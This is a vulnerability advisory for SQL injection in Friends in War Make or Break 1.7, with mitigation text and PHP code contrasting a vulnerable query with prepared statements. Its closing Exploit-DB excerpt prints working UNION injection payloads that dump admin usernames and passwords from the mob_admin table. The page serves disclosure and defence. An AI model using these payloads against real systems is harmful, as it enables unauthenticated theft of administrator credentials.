Vendor: Make or Break
By: Ihsan Sencan
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Make or Break
Affected Version From: 1.7
Affected Version To: 1.7
Patch Exists: NO
Related CWE: N/A
CPE: a:friendsinwar:make_or_break:1.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2017

Friends in War Make or Break 1.7 SQL Injection

The vulnerability exists due to insufficient filtering of user-supplied data in the 'username' and 'catid' parameters of the 'useruploads.php' and 'index.php' scripts. A remote attacker can execute arbitrary SQL commands against the application's database and gain access to sensitive data. The attack can be performed without authentication.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should use parameterized queries (prepared statements) when interacting with the database.
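The mitigation above in code, as an added example that is not part of the Make or Break sources: a string-concatenation pattern of the kind the advisory describes for the 'username' and 'catid' parameters, beside PDO prepared-statement versions that bind the values as data. Table and column names (uploads, items, filename, title) and the connection details are assumptions for illustration.

```php
<?php
// Added example, not Make or Break code. Table/column names and the
// connection details are placeholders chosen for illustration.
$pdo = new PDO('mysql:host=localhost;dbname=mob', 'db_user', 'db_pass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
]);

// VULNERABLE: the pattern the advisory describes. The raw GET value is
// spliced into the SQL text, so the parameter can alter the query itself.
function listUploadsVulnerable(PDO $pdo, array $get): array
{
    $username = $get['username'] ?? '';
    $sql = "SELECT id, filename FROM uploads WHERE username = '$username'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// FIXED: parameterized query. The value travels as a bound parameter and
// is never parsed as SQL, whatever characters it contains.
function listUploadsSafe(PDO $pdo, array $get): array
{
    $username = $get['username'] ?? '';
    $stmt = $pdo->prepare('SELECT id, filename FROM uploads WHERE username = ?');
    $stmt->execute([$username]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// FIXED: 'catid' must be a positive integer, so validate the type first and
// still bind it; anything non-numeric is rejected before it reaches the DB.
function listCategorySafe(PDO $pdo, array $get): array
{
    $catid = filter_var($get['catid'] ?? null, FILTER_VALIDATE_INT,
                        ['options' => ['min_range' => 1]]);
    if ($catid === false) {
        http_response_code(400); // bad request, no query issued
        return [];
    }
    $stmt = $pdo->prepare('SELECT id, title FROM items WHERE catid = :catid');
    $stmt->bindValue(':catid', $catid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
```

Both fixed functions return the same rows as the vulnerable one for well-formed input; the difference is only visible when the parameter carries SQL syntax, which the bound versions treat as an ordinary string or reject outright.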

Exploit-DB raw data:

# # # # #
# Exploit Title: Friends in War Make or Break 1.7 SQL Injection
# Dork: N/A
# Date: 26.07.2017
# Vendor : http://software.friendsinwar.com/
# Software: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
# Demo: http://localhost/[PATH]/
# Version: 1.7
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/useruploads.php?username=[SQL]
# -sie'+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-
# http://localhost/[PATH]/index.php?catid=[SQL]
# 1+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-
# Etc..
# # # # #